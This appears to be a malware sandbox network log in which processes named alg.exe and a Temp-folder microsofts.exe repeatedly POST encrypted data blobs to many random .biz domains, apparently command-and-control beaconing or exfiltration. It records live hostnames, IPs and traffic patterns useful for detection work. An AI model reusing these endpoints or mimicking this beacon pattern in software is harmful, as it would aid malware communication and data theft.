Set-Cookie: btst=6e0bd02a8073bfe26b8b3f0d774aec7a|8.46.123.33|1728547714|1728547714|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 50029 | 18.208.156.248 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:34.883474112 CEST | 352 | OUT | POST /thacrmsw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:34.883879900 CEST | 778 | OUT | Data Raw: 59 13 66 57 7d 0d 86 14 fe 02 00 00 2a 15 61 1b 3f 04 00 9e 0b a6 f0 73 25 d3 86 85 9a 30 46 6b e7 30 db 34 ac fb e2 43 a4 c8 f2 68 11 90 5d e5 5d a7 ac d2 f4 95 6e af 15 64 d5 2e d6 ec ed 45 5e a5 71 8f 47 ff 05 5f 0f 81 e2 2d 76 14 da e0 ef a3
Data Ascii: YfW}*a?s%0Fk04Ch]]nd.E^qG_-v%AEQT@U4,|p;,R<ig{`+p>?uT./_aE,;OZw/Z0Q zU)>T@ke-wUq%)SOk&R@K14G
Oct 10, 2024 10:08:35.339660883 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=65eadb769c84c110c1181167695f80a4|8.46.123.33|1728547715|1728547715|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 50030 | 13.251.16.150 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:35.551043987 CEST | 351 | OUT | POST /rdoagulou HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:35.551054955 CEST | 778 | OUT | Data Raw: d0 63 f6 48 60 5e 43 e8 fe 02 00 00 da 35 7f 5a 6f f9 9a 68 9c 53 a1 70 d6 2e ff 2b cd dc 29 61 93 79 24 38 c1 f9 8c 75 28 20 06 e4 9b b5 35 11 eb 86 49 4f ce 01 47 b4 3a 78 16 ea 55 1f 57 2e a0 28 26 9d 66 87 ef 0c 27 98 86 bd e7 ac 2d 67 12 a5
Data Ascii: cH`^C5ZohSp.+)ay$8u( 5IOG:xUW.(&f'-gAIBfs'7X_Ao`7{(6"RXID22cK"80]D4RSXe^_BZ1PFV=EJ[F~)vR4f3BdbX
Oct 10, 2024 10:08:36.919369936 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=89d622ff21642884e7a31b2e252d1b95|8.46.123.33|1728547716|1728547716|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 50031 | 13.251.16.150 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:37.143621922 CEST | 346 | OUT | POST /m HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:37.143646955 CEST | 778 | OUT | Data Raw: 6d 6e ec e2 dd c9 1a d5 fe 02 00 00 ff 14 22 b9 40 e4 f3 0d e8 28 c4 4b 42 50 bc a5 26 52 c1 36 6a a3 2c 78 b7 a4 a5 05 91 fc 48 9b ea 88 c5 5e 77 b0 7c ac d4 2f 99 85 c6 b1 21 37 c8 e8 00 8e 0f 0f 97 65 e6 39 dc a3 16 3c d9 32 a6 b2 d2 11 38 4f
Data Ascii: mn"@(KBP&R6j,xH^w|/!7e9<28OAd?c =V'?[Z9%;m(oY*@'*f#!7ZiL89}p*Pgu;uxgU')(K(?h#T6KyQWUC}}
Oct 10, 2024 10:08:38.521459103 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ed8025b138d0b9c7c84934ad767fcdf3|8.46.123.33|1728547718|1728547718|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 50032 | 34.211.97.45 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:38.753678083 CEST | 346 | OUT | POST /jk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:38.753776073 CEST | 778 | OUT | Data Raw: 3f 3f 65 70 03 a0 79 ce fe 02 00 00 84 ce 04 46 2a 1a 03 db 57 24 ab b1 30 bf cf 1f 0a ca 76 03 8b 76 83 ea 3d c9 bc 3e d9 7b 3c 83 bf b6 20 ed 1d 5f 97 98 08 cb c7 b8 d2 2f 02 db 56 87 83 ab 74 72 a8 0b e6 5c 9a 1f ba a0 07 94 b2 2a fd 95 a9 5d
Data Ascii: ??epyF*W$0vv=>{< _/Vtr\*]+AIsb5aR;;h}p|H"xmH}[ `/$nJs8ZMwl!Nv=;i;Ip Oe_"!Ja.BGKYoXhEasb0
Oct 10, 2024 10:08:39.636487961 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2536269235145a812c6a6ae0004bac60|8.46.123.33|1728547719|1728547719|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 50033 | 47.129.31.212 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:39.946084023 CEST | 350 | OUT | POST /kjqwmlcq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:39.946098089 CEST | 778 | OUT | Data Raw: af fd e6 21 3b 7f 29 35 fe 02 00 00 4d 09 f4 a0 39 b2 c3 51 e1 de 4a cf 0b 18 22 95 97 e2 f3 33 ab fb 8f 7b 86 ff d4 d6 4e bf 21 b0 76 bb d7 f0 ae 52 0b 1e 0e 72 b2 7c f5 82 69 0d a0 76 98 51 36 88 4b e0 17 d4 3c 12 bf f3 44 c0 86 70 f1 12 f3 94
Data Ascii: !;)5M9QJ"3{N!vRr|ivQ6K<Dp&3@VkTUB6m;_?Qo- u(y7d|573[dXD`78y8=d8_in|]``RnK(KRW owwn+rZ]o
Oct 10, 2024 10:08:41.302709103 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2e97e718355aa00502ccc963d1ab168b|8.46.123.33|1728547721|1728547721|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 50034 | 13.251.16.150 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:41.529721022 CEST | 357 | OUT | POST /uluonacniewnep HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:41.529752970 CEST | 778 | OUT | Data Raw: 1b 3d 22 c5 59 d6 a2 a8 fe 02 00 00 e0 76 4d 55 c3 aa 99 eb 7b fb 27 93 44 f7 5c 3a 78 fb bd ef 51 ab 7c 60 65 61 7d aa 95 bb 80 66 64 e9 98 6d ce 33 6d 91 7e 3f f9 b2 07 a2 16 a0 4a 0d fd 98 48 de a1 44 a1 58 66 25 81 0f 02 5d 7c 53 20 75 1e 76
Data Ascii: ="YvMU{'D\:xQ|`ea}fdm3m~?JHDXf%]|S uvr)xgaD9SE`TQ}f5Mwos`SETc&ztZvsaqWG-\,l/z%9]KqAY"5j":=FccPbzuZR!3
Oct 10, 2024 10:08:42.906094074 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b30e2c74c626f589fcd53350420184fd|8.46.123.33|1728547722|1728547722|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 50035 | 34.211.97.45 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:43.246237993 CEST | 342 | OUT | POST /n HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:43.246908903 CEST | 778 | OUT | Data Raw: 20 bd 1b 13 e1 85 db c5 fe 02 00 00 21 37 ca a6 3f 94 87 d5 ff 2a a5 39 97 16 43 22 bd 0f cf 0d cc 9e 08 83 38 b7 78 26 f5 eb 01 70 aa 83 a4 1c a5 56 3c 58 5a c6 71 01 f8 4a 44 97 d8 d4 5b c4 a9 77 3a e1 31 dd 3e 02 92 59 24 39 6c 64 94 b6 eb 8e
Data Ascii: !7?*9C"8x&pV<XZqJD[w:1>Y$9ldYegk$`IjJ1-t'H{D7E.dBCOV7.6zZPb#o|7/CKpl&E7'{rk#6:}&v?9X"_bf0hk#
Oct 10, 2024 10:08:43.971321106 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=87396c7ab743c7c3ee1b33fe97cd6d03|8.46.123.33|1728547723|1728547723|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 50036 | 47.129.31.212 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:43.906249046 CEST | 350 | OUT | POST /vpbxgqp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:43.906280994 CEST | 828 | OUT | Data Raw: 66 54 49 1a c7 d2 2e 8d 30 03 00 00 b3 07 d8 32 0e 42 08 a6 e7 50 ff ae 10 f3 55 7d d3 21 d6 a4 8f 29 ea 08 75 f2 7e fc 52 06 06 f0 0a 6b de 9e 1b 21 f1 1d 8a 22 a6 7a 89 9c 09 b0 77 60 cd 34 67 67 93 bf f9 03 f5 9d 41 2c 22 ea f7 4b 14 ee 8c 25
Data Ascii: fTI.02BPU}!)u~Rk!"zw`4ggA,"K%a6-;) jp"YJncv!Q9Td(U8$e~k0o^)HI$OE^9L5v\tPF!)$ex&"(ru_A(UE
Oct 10, 2024 10:08:45.269949913 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=415e06fdbe033d5919286f8815043898|8.46.123.33|1728547725|1728547725|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 50037 | 3.94.10.34 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:44.270044088 CEST | 353 | OUT | POST /hqowbucy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:44.270076990 CEST | 778 | OUT | Data Raw: 8f ae d9 2f 5d 34 bc 6a fe 02 00 00 61 bb a5 54 50 67 c3 cb d3 41 e9 61 61 97 cb 27 39 83 47 9d 68 d6 0b d9 90 b2 fc 54 18 ba b9 bd b1 2f b2 ee 03 48 62 16 a1 26 b9 04 14 20 6b 4a 83 43 07 5c 10 fe ab 02 5c b1 ba 11 f1 a6 74 d6 e8 e4 1f 80 11 63
Data Ascii: /]4jaTPgAaa'9GhT/Hb& kJC\\tc<+:3'd`GeM~9[3xEG='pEjyJbhXU\*}%v_z7:N"s^a2RRK,jA=fKkB'd:gr?s$G>
Oct 10, 2024 10:08:44.742204905 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1d9c5911d9cb031a23bd3643761ddcfc|8.46.123.33|1728547724|1728547724|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID: 57 | Source IP: 192.168.2.5 | Source Port: 50038 | Destination IP: 44.213.104.86 | Destination Port: 80 | PID: 7120 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:45.161293983 CEST | 346 | OUT | POST /ohp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: qpnczch.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:08:45.161312103 CEST | 778 | OUT | Data Raw: 69 5e a2 a0 b9 e0 06 f5 fe 02 00 00 ba a9 98 24 a0 9d 18 4a 5c 92 f8 aa 6c 53 ad 43 74 bb 24 53 43 ac f1 4f 49 08 f6 0a f6 48 7e 14 ea 58 28 87 c5 f1 91 de a1 dc 56 27 98 95 61 99 57 c0 5c 6d ae cb d2 ff 8e ee e4 19 9b d9 7d 44 57 98 4e a0 f9 f2
    Data Ascii: i^$J\lSCt$SCOIH~X(V'aW\m}DWNz\p5P}dZ%D#eMoo}!Uj\CB:rb%df(l+r9)~+n~&caPOkPrHmzG[%UJs* t!Z\-)^
Oct 10, 2024 10:08:45.638771057 CEST | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=aa5862c9a8f575cb8d37fb2782cfd8d4|8.46.123.33|1728547725|1728547725|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 58 | Source IP: 192.168.2.5 | Source Port: 50039 | Destination IP: 13.251.16.150 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:45.313863993 CEST | 355 | OUT | POST /wkqumdvynqwto HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ifsaia.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:08:45.313888073 CEST | 828 | OUT | Data Raw: 95 75 2d b0 13 55 bd ad 30 03 00 00 cc fe 14 c9 0e 1f 71 35 67 c1 82 38 56 f6 d2 39 c6 1e 76 8b b4 56 81 7c 32 39 34 58 70 9a f1 07 3e b9 89 8c f7 04 55 14 eb 33 d6 a3 6a a2 e3 2a 10 0a f0 1a 58 47 f0 4c ea 2a 38 4e 3f 9b a7 2a 00 d7 2a 95 c3 43
    Data Ascii: u-U0q5g8V9vV|294Xp>U3j*XGL*8N?**CjU;"l)Ny%gXv4rU;t! H0.!M&5!u:II9inhP^\*t)?#17IHb\S7/uX
Oct 10, 2024 10:08:46.708317995 CEST | 408 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:46 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=82fde5c2bf731d995396de9e5669cae2|8.46.123.33|1728547726|1728547726|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 59 | Source IP: 192.168.2.5 | Source Port: 50040 | Destination IP: 3.254.94.185 | Destination Port: 80 | PID: 7120 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:45.805876970 CEST | 356 | OUT | POST /npjswmwoxwkrbxd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: brsua.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:08:45.805902958 CEST | 778 | OUT | Data Raw: e2 c6 35 c7 e3 c4 70 b1 fe 02 00 00 54 36 1a 4f d9 dd 72 43 39 71 ec 63 9b 56 d2 b6 c2 a4 fa c7 2d 67 9c 57 6b cf d0 49 91 0d 6a 0a eb 29 68 fb d3 8f 28 8d d5 99 63 63 c9 f1 65 02 4f 30 16 cb 96 bc af b5 e6 f1 9a 34 05 a9 00 68 ad 2f 02 50 2e d9
    Data Ascii: 5pT6OrC9qcV-gWkIj)h(cceO04h/P.@t& =uj}wDe|(6 |r5c1%7Kk9Of_2g.@H[asHRN<6\Ci)(n,.~2*ty)[E%L~iBku4jC0K)
Oct 10, 2024 10:08:46.574239016 CEST | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:46 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=6fdba495948d81c8ab4fa71f1d7aefd0|8.46.123.33|1728547726|1728547726|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 60 | Source IP: 192.168.2.5 | Source Port: 50041 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:46.953394890 CEST | 353 | OUT | POST /kfodjblu HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: saytjshyf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:08:46.953394890 CEST | 828 | OUT | Data Raw: a7 56 7d 1f e7 b4 53 17 30 03 00 00 ad 3c 52 34 28 87 6f 32 86 2f d5 a2 7c ee 2c a0 4f 8b a7 f7 30 16 63 89 77 11 c3 0b 99 7e 42 2a 84 53 eb 04 80 d9 81 bc 5e 41 94 dd 9d 18 e5 90 17 08 4b 2a a5 a1 23 19 d0 17 c1 f5 71 bd 64 fe 95 6c 88 83 5a c0
    Data Ascii: V}S0<R4(o2/|,O0cw~B*S^AK*#qdlZ-aw4lR'5)cZ?5X8VJX4w+1\rX):vdNQ59A%3cIjQ5PuO4%F`hrg1[CUv
Oct 10, 2024 10:08:47.469376087 CEST | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:47 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=0da0561701d40390dbf4d101a3f36330|8.46.123.33|1728547727|1728547727|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 50042 | 85.214.228.140 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:47.105982065 CEST | 352 | OUT | POST /hdqasqyy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:47.106024981 CEST | 778 | OUT | Data Raw: b5 fc f0 2d dc 91 59 b7 fe 02 00 00 7b 36 f2 d2 81 0d 1d ac 2a bf 89 ab 53 f5 59 6e 04 e7 52 0e 00 09 c9 fe e0 5a 4f 18 23 36 9d 27 c6 70 ff e4 ec 0f 82 4e 66 d6 4e 19 9e 49 43 ad f8 44 46 82 41 33 f2 e5 93 0e 1a 74 58 f9 94 c6 8a d9 5d db 5e e5
Data Ascii: -Y{6*SYnRZO#6'pNfNICDFA3tX]^@\H|$[hNzb#weFGPokEEm$Ip"ge9_zwek-IFU2[mjj9x]6p1PC4Oo?!yLaz
Oct 10, 2024 10:08:47.731312990 CEST | 166 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Thu, 10 Oct 2024 08:08:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 50043 | 18.141.10.107 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:47.689661026 CEST | 347 | OUT | POST /qtuy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:47.689661026 CEST | 828 | OUT | Data Raw: 43 14 08 e7 47 9c f1 e1 30 03 00 00 02 e7 0b 04 08 8b 7f a2 c2 44 81 3e aa af 5d 1e 0e fc 3a c2 56 06 2c 39 e7 68 d2 2c eb e3 21 c8 f1 f0 1b 93 98 06 95 c2 8b 61 bb f6 e7 66 73 3a b6 69 64 aa 35 c7 3c 63 7b 72 27 fd 5e 55 d0 8b e9 de 7d 43 44 af
